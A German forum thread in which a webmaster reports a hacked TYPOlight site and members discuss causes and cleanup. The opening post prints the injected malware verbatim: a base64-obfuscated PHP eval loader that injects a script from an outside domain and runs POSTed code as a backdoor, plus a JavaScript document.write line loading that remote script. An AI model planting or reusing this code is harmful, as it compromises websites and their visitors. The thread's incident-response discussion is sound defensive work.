Seite gehackt worden? Woher kommt das?

[markusger]

Hallo zusammen!
Ich habe eben eine meiner Seiten besucht und festgestellt, dass diese nicht funktioniert
Als Fehlermeldung kam in etwa folgendes:

Fatal error: Cannot redeclare nogc() (previously declared in /srv/www/htdocs/web288/html/system/constants.php(1) : eval()'d code:1) in /srv/www/htdocs/web288/html/system/libraries/Config.php(1) : eval()'d code on line 1

In einigen Dateien habe ich folgenden Code entdeckt:

PHP-Code:

<?php eval(base64_decode('aWYoIWlzc2V0KCRub2djMSkpe2Z1bmN0aW9uIG5vZ2MoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19tYXRjaCgnIyB3aWR0aFxzKj1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyVnNaWFpsWkdGdWVtRXVZMjl0TDJGeVkyaHBkbTl6TDB4QlgwNUJRMGxQVGw4eU1EQTRMbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24gbm9nYzIoJGEsJGIsJGMsJGQpe2dsb2JhbCAkbm9nYzE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJG5vZ2MxKSljYWxsX3VzZXJfZnVuYygkbm9nYzEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSkgYXMgJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0nbm9nYycpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSAkc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdub2djJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JG5vZ2NsPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCdub2djMicpKSE9J25vZ2MyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>

Wurde die Seite gehackt? Woher kommt das? Vor ca. 30 Minuten lief die Seite noch einwandfrei.
Grüße
Markus

//EDIT:
in einigen js-Scripts finde ich einen Bezug auf folgendes Script

Code:

document.write('<script src=http://elevedanza.com/archivos/LA_NACION_2008.php ><\/script>');

[frank]

Das könnte evtl ein Virus sein, der sich eingeschlichen hat!?
Hatte auch einmal so ein Problem und konnte es mit "G-Data" lösen.

Gruß, Frank

[Nina]

Es handelt sich ziemlich sicher um Schadsoftware die eingeschleust wurde. Allerdings gehe ich nicht davon aus, dass die Ursache TL ist (war bisher in vergleichbaren Gründen nie so gewesen), sondern entweder der Server gehacked oder dein PC infiltriert wurde.

Möglichkeiten wie das passieren konnte, gibt es viele:

• Der ganze Server wurde vielleicht z. B. aufgrund veralteter darauf laufender Software gehackt (erkennt man daran, wenn andere Webhosting-Kunden auf dem gleichen Server ebenfalls diesen Code aufweisen)
• Dein Webspace wurde vielleicht gehackt; liegt meist an unsicheren Scripts die sich irgendwo darauf befinden; oft z. B. veraltete oder selbst erstellte Scripte die nicht gegen XSS oder ähnlichen Lücken gesichert sind
• vielleicht geklaute FTP-Passwörter (z. B. über Fake-Seitenverlinkungen in Websites)
• Du nutzt vielleicht veraltete Software in der Lücken ausgenutzt wurden. Es kam z. B. öfter vor, wenn Leute Filezilla in alten Versionen einsetzten!

Ein ähnlicher Beitrag ist hier zu finden.

[leo]

Ich hatte eben den exakt selben Fall bei einem Kunden. Es ist äußerst wichtig darauf zu achten, den Schadcode nicht nur aus der index.php zu entfernen! In meinem Fall waren sämtliche index.php-Dateien, sämtliche config/*.php-Dateien, die system/*.php-Dateien, alle DB-Driver, die TCPDF-Konfigurationsdatei und seltsamerweise alle Klassen der Erweiterung BackupDB betroffen. Der Angreifer ist sehr überlegt vorgegangen und hat offensichtlich gewusst, welches System er hackt!

Die betroffenen Dateien findet man am besten über die Kommandozeile:

Code:

find /pfad/zu/typolight -name '*.php' | xargs grep aWYoIWlzc2V0KCRvY28

Der Teil hinter dem "grep" ist der Such-String, der durch den jeweiligen Schadcode zu ersetzen ist. Falls keine Suche in den Dateien möglich ist, sollte man zur Sicherheit die komplette TYPOlight-Installation ersetzen.

Selbstverständlich sind sofort alle Passwörter zu ändern und ein ordentliches FTP-Programm anzuschaffen.

[frank]

Hallo Leo,

so wie ich das in Erinnerung habe, werden auch JS-Dateien verseucht! Bitte einmal prüfen.

Gruß, Frank

[Stephan]

Zum Thema Schadcode ist dieser Google-Artikel evtl. für den ein oder anderen von Interesse. Mit den Webmaster-Tools kann man nun detaillierte Informationen zu dem monierten Code abrufen, um einem solchen Problem schneller auf die Spur zu kommen.

[leo]

Nachdem dieser spezielle Exploit eine PHP-Anweisung beinhaltet (siehe Post von markusger), schien mir die Prüfung der PHP-Dateien ausreichend. Aber Leo (Unglaub) hat Recht, im Zweifel sollte man alle Dateien prüfen.

[Thomas]

Ist das jetzt ein Problem von Typolight, oder kommt das von woanders?

Was ist mit Windowsservern?

Ich kann mich erinnern, mir sowas mal Lokal eingefangen zu haben.
Da sorgte ein Virus/Wurm für die Infektion von allen index Dateien (php, html, htm usw.).

Ist jetzt nur zu lange her, dass ich nähere Infos geben könnte.

Bekannte und aktuelle Exploits für TL finde ich immer noch nicht.
Ich gehe aber davon aus, je bekannter TL wird, gerät es auch in einen größeren Fokus der Hacker.

Wie sieht das bei Erweiterungen aus, die externe Dateien einfügen?
Werden diese explizit von TL geprüft?

Sind ja alles Fragen, die aufkommen werden.

[FloB]

Das klingt mir alles sehr nach einem direkten FTP-Zugriff aus – wenn ein PHP-Script verwendet wurde (was eingeschleust hätte werden können), würde man dieses Script sehen oder in den Logdateien (Apache) einen entsprechenden Aufruf finden. Die TL-HTACCESS blockiert aber (wenn aktiviert) letztere Angriffe automatisch. Bleibt also eigentlich nur der FTP-Zugriff.

[MacKP]

Sehr häufig ist es einfach ein trojaner auf dem lokalen System, welcher die ftp Passwörter ausliest (Filezilla hatte zum beispiel in ältern Versionen einen Bug, der so etwas ganz einfach ermöglichte). Und genau das ist auch die meist verbreitetste Variante. Ist bei den ganzen Windows Rechnern an denen Leute mit Admin rechten arbeiten ja auch kein großes Problem ;-)

Viele Grüße

[Thomas]

@leo.unglaub
Das sind Preventivfragen, die ohnehin aufkommen.
Dann gleich lieber vorweg klären und es bleibt ruhig.
Wichtig sind die Fragen allemal, alleine schon für Argumentationen dem Anbieter gegenüber.
Nutzer von Webspace haben schließlich oft wesentlich mehr Seiten auf dem Server, ohne das sie es vielleicht wissen. Und von deren Seiten besteht oft die Gefahr.
Wie oft hat man sowas schon bei Kunden oder selber erleben müßen.

Und sowas hat nichts mit Paranoia zutun, sondern eher zum Schutze von erstellten Seiten.
Nichts für ungut.

Windows oder Linux?
Diese Frage stellt sich für mich selber nicht. Es existieren aber beide Systeme und beide werden auch genutzt. Zumal nicht jeder genau weiß was er tut.

An dieser Diskusion werde ich mich auch nicht beteiligen, sollte es dazu mal wieder kommen.

[markusger]

Hallo zusammen,
ich möchte euch kurz auf den aktuellen Kenntnisstand bringen.

Zum System selbst: ich habe dort einfach das letzte Backup aufgespielt. Damit sind alle Dateien überschrieben worden. Da bin ich einfach auch Nummer sicher gegangen.

Die entsprechenden Passwörter wurden alle geändert.

Der Hoster selbst hat nach seiner Auskunft kein fremdes Eindringen feststellen können. Der Verdacht liegt also nahe, dass das FTP-Passwort ausgespäht wurde. In diesem Zuge hatte ich aber bereits sofort nach dem feststellen des Angriffs alle Passwörter durch neue zufallsgeneriete Passwörter geändert.

Was mich im moment jedoch noch stutzig macht: Ich konnte nirgendwo den Grund für das abhandenkommen der Passwörter feststellen. Mein PC ist virenfrei. Filezilla war auf der aktuellsten Version. Das Passwort selbst war kryptisch. Da hätte nur Bruteforce Sinn gemacht, was aber laut Logfile nicht der Fall war.
Schon seltsam.

Soweit erstmal. Danke auch für eure Hilfe!
Grüße
Markus

[xtra]

Sofern du ein backup vom gehackten system angelegt hast, checke dort doch dein ftp daemon log, welcher user die Dateien veraendert/hochgeladen hat und wann es war. Das koennte dir weiterhelfen.

Das Problem hatten wir, mit anderem Schadcode, auch einmal bei einem Kunden von uns.
Problematisch ist das speichern von Passwoertern immer, da sie immer auch ausgelesen werden koennen (liegt in der Natur der Sache, ansonsten braeuchte man sie ja nicht einspeichern).
Daher sollte man es, besonders bei kritischen Dingen, lassen!

Gruss
Chris

[FloB]

Mein PC ist virenfrei.

Wer's glaubt, wird selig .
Nein, im Ernst, dass ein Virenprogramm nichts findet, heißt nicht, dass dein PC virenfrei ist. Das Virenprogramm hat einfach keinen ihm bekannten Virus gefunden – oder wurde vielleicht sogar untergraben?

Hast du mal einen Rootkit-Scanner laufen lassen?

[zed]

Hallo Markus

Was mich im moment jedoch noch stutzig macht: Ich konnte nirgendwo den Grund für das abhandenkommen der Passwörter feststellen. Mein PC ist virenfrei. Filezilla war auf der aktuellsten Version. Das Passwort selbst war kryptisch. Da hätte nur Bruteforce Sinn gemacht, was aber laut Logfile nicht der Fall war.
Schon seltsam.

Versuche, falls Du es nicht schon tust bzw. wenn es dein Hoster unterstützt, SFTP zu verwenden. Bei "normalem" FTP werden Benutzername und Passwort im Klartext übertragen.